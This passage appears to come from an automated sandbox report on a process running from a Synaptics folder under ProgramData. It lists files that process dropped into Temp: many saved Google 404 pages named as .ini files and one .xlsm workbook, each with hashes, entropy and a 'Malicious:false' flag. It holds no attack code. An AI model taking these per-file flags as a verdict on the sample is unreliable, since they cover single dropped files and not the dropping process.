                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LbyLuxP_sYZ194Wy-_-WEw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\Jdn8Jvt.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.261838307735042
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+07pXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+S+pAZewRDK4mW
                                                                                                                      MD5:1992BA04DEED2EDECAAB987F36B6C3DD
                                                                                                                      SHA1:4D823D8777550AAC99620A07D2A2F51AB4F6AB03
                                                                                                                      SHA-256:A2BF38A7370E2DCEA7E8EBD6D25CD3A7403FBCA44A81BBA4052600CC511157AE
                                                                                                                      SHA-512:507E7A0269EC99300B4BF9B2191762461A1D6F78BA0E45DB9D4377E77DAEB37EFC06FB63D70423034DFBDD07E64370E62B589A951201F47EE443010F3AAD00E2
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="90_xbrI0ANdQw76QGkPGvw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\NEnoihuS.xlsm

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18387
                                                                                                                      Entropy (8bit):7.523057953697544
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                      MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                      SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                      SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                      SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                      Malicious:false
                                                                                                                      Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                      C:\Users\user\AppData\Local\Temp\OacfF9q.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.254198315789012
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0dXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+kX+pAZewRDK4mW
                                                                                                                      MD5:CC1DF8F8CAAD4277D180AD1AAAC25EB9
                                                                                                                      SHA1:5F62139BE47F4F446199F1B3980014918E5F3F30
                                                                                                                      SHA-256:C8690967E7A712B1CA8B58F47D7E1728FE8C0160C4E30A60E6D364813CDC33EC
                                                                                                                      SHA-512:10679CCE57C4E987BFB39A98635D8FFB507DA942C089B90AA89BE71FCDDD9BB3FF762E7807459671B186A641B4F257DB90E2787EB8504E7807B15DC3691DAEEB
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_WFNq8wlE11cTk8i-87wpQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\QTnieXO.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.2634141685051725
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0dSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+i+pAZewRDK4mW
                                                                                                                      MD5:C67B7450253F3490FADC3E91390BFF54
                                                                                                                      SHA1:17D12507A926CCE02FB63F231B7F27B8E52E0983
                                                                                                                      SHA-256:2FCC5E888A7813D464386D3B0B9B8F5588E99162A69FD995C49A7B763382CE83
                                                                                                                      SHA-512:68A2DC11A39BD93882FC73AC295FCF75C5825CC0A0BA80875434095F18AA6AE7CDA66504ABB495CA5087EE05024713BEBD371220CAF2B01313879B3BCCF96973
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0nNVXhXTsNXO_1m4RxqIZg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\S6XCnW3.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.263702672962292
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0A0TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Rg+pAZewRDK4mW
                                                                                                                      MD5:1912E730CE5458468ED5DA33830ADE03
                                                                                                                      SHA1:C1445D974BC8D7E037F2F2CD76785C7340F2FDB2
                                                                                                                      SHA-256:349C3C07870EC0B72AEC8ED6A6BD829C67A54CA350174BF16D4FC83BE8416DCA
                                                                                                                      SHA-512:1F613652FEA08A1A2FE255EC56BEE97EF5FF94225BFC7F863204628F54F2912AA6178A3F53BB073A218385DB681B5B00CB3EEBDC12F1776C4E2874BB46D33C4B
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="L_E1Htsgwz4R8X06cq3-SQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\TsCyTrn.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.264412294733581
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0XRbbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+K+pAZewRDK4mW
                                                                                                                      MD5:ED5350984ECCC74494A428A9D7591FDA
                                                                                                                      SHA1:C0395BC434CD58821F906CB65EC1B202BBCB536C
                                                                                                                      SHA-256:0F148197A633886B0C328ACC1BB30FBBC92EAF6FBB98EDA5079F6EDADCEF0B32
                                                                                                                      SHA-512:AE5130BBF2135299A3CBD1D8B9CF9227104A3CE960B9D1484F5F239D8E599C6188895EE52C0A93574C4A9D3C464296E4AA3A30AEBDD5AB172EA329457997563E
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gOgX9IaiHbqZSgK-r7OQnA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\WbF56gH.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.276326816022294
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0loXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+QK+pAZewRDK4mW
                                                                                                                      MD5:5D062426A540D8F94E401E5157832C5B
                                                                                                                      SHA1:83B3DEFACA20FDA91D8DAE3D9633837563EA2120
                                                                                                                      SHA-256:FFF1AF80B4F9A3BA4493C6DA36C2BAB355EF2C06CACE9ED2B64D75A8B003F675
                                                                                                                      SHA-512:2EE12AD3E7EE2CA5EDB48A2EFE9515E2534430888F8140A0861D0077902C54F77306D61671C737264B37DB060D1A18A5613D73FE7034B4F45FA6016B5E402218
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XrSyQSqvNMLaW6c39Zg46A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\WzWqRJE.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.2578830152190035
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+02SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1+pAZewRDK4mW
                                                                                                                      MD5:859EB5760D4E8B70A896139E6314788B
                                                                                                                      SHA1:62A01765522256F1D862729B8DCD93DB0D2EBE5D
                                                                                                                      SHA-256:60B8A0D66B4EC9537EE3754CAD9F0C012B71B082F58BAEF970805E41DEC15ED6
                                                                                                                      SHA-512:2E0DABCEDD186C7986230B80A8551484AD1776691B6719C028D0E36AA285D6DC4D827066186011A34A852C71CDF84CEC7AE47D1DBD8C0530C4E2CD8C8A0EF03F
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OfPvGS9_nxdmAi8Nxky6lw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\anRdUUb.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.260463139233421
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0ebbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Zb+pAZewRDK4mW
                                                                                                                      MD5:377E146287E282F7DD4CE99B5EBBB4F5
                                                                                                                      SHA1:8D23F3C818F8C6C453027D71DD23B249B8C52249
                                                                                                                      SHA-256:33119FD078EA70C9302E0C4024B737D0F234388764ED72CD3A213D7DEEDEE755
                                                                                                                      SHA-512:8AC676BEE04F27EF3E2B4FC6C499B75D6776DA1A8626FD320CCF22CD80A31468F9DF7E018E335C470D3979D3A24C51964AE3BA5F1C1758C5E9C06A8E722A5D04
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="S2YmiobKq-UwXI3ZeoAwpQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\bhzI4AD.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.252006164797164
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+00SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j+pAZewRDK4mW
                                                                                                                      MD5:3ABDC310686F557106AAE76C7944F1D6
                                                                                                                      SHA1:12528D3F6E23487153084A2D562F76804D954F15
                                                                                                                      SHA-256:8F814FEED9D19C51A5EAA3015D0E9EE54F80D6688A7B36E54B183FAE6ED281E6
                                                                                                                      SHA-512:2F688F3A8014FC0D014510A6AF85D061D0019D38B299FEC182C6DDF21271A02AEB63B51158C215BF100CFF1AEB6A2DEAD60B392D45832EE4479B1DCAB4ACE17B
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="p4F6wniNAbmJG-AoWai83g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\cnaX849.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.267798918850528
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0ZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W+pAZewRDK4mW
                                                                                                                      MD5:8E3A89B49641BCAB9B6F355A814C845F
                                                                                                                      SHA1:A320D00362340D578A87482430BCC21E71BC17B4
                                                                                                                      SHA-256:D4F4C8E1A6A84D06D4D4A21B62EFEAB24E5FC7C7012A871C76A54C3335C320FF
                                                                                                                      SHA-512:B52C44EA5135727D527E5BD94A42864634069CA0417E6F0038F6FA8064EA6B0359C8D87BA5851DCED15AF3EDBEAA10037B63C35DB0DF1818B5CDBE4CF81C26E7
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SheKAJPDxzry6l40oBFbOA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\cpq8vJr.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.246363630581017
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0oUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Q+pAZewRDK4mW
                                                                                                                      MD5:7C6CB0AAA5E135AB24A4A06F06BFBD71
                                                                                                                      SHA1:76DC1AF692A99052D71CF821AD084B237DC86E45
                                                                                                                      SHA-256:CCF1461B4F7797A71701343AE7635B844AFB4D880442BECF6DAE329D507C8532
                                                                                                                      SHA-512:F86FDAF5AEDAF9635DF82DA7DB6ED59647E575B7F24180AF59EF89731BBD5DDBF10484A0C870BF54249B7A4BDC4D4EE5F78EF62F534FD484A4162B4FFE909DA0
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8wYzw3ylt_ofRmpNpyyxGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\fZgkg4M.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.251708438717126
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0kQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+TQ+pAZewRDK4mW
                                                                                                                      MD5:74D95ECBA909ED08A7353C33F47946FA
                                                                                                                      SHA1:E33ECFCC5C77EAB4128AD8290940D78123022879
                                                                                                                      SHA-256:41046D9879713E13201B3636A4FFEE545BD4F339A067CEE9E28EFCE30C0320E0
                                                                                                                      SHA-512:E9E5E22F18574FB5993DC166EDF3C51670C406B0E6BF33C55F964B5DB1FABD3A80D07B124078816DBB92B75FDFAC1B8F502500AA25A5DA9A236E7376100A4E03
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="meIxtuzl3CVwmZvryPCp5g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\gwQv9q1.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.266645006421247
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+w+pAZewRDK4mW
                                                                                                                      MD5:AD06FD2973AE5292DDC7789642172563
                                                                                                                      SHA1:4B935C5E1320DF9418FF429C16471C3029AF28E1
                                                                                                                      SHA-256:32BCD20D623744E8F7DB60F8AE3B066B082CE9B273A625DE19D40D01D27B8930
                                                                                                                      SHA-512:12DB1AB4FDBD36C6604B2BF77DFCB16DDDED4D1E46D9C3DE831A7719E7A7F51DCBD6129A0199D3FE3EC18FF60D3C48A35506B77EF840A6759F338F18379752B1
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7jzsIQUJwyu3pRGlCcH7jg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\iY4U6FM.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.248589973671497
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0ZQvRSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+aQp+pAZewRDK4mW
                                                                                                                      MD5:1E805CE417251C404D5E027219E40225
                                                                                                                      SHA1:3C7A4EBFE7884E91E954F96C326BD40EE612D6BA
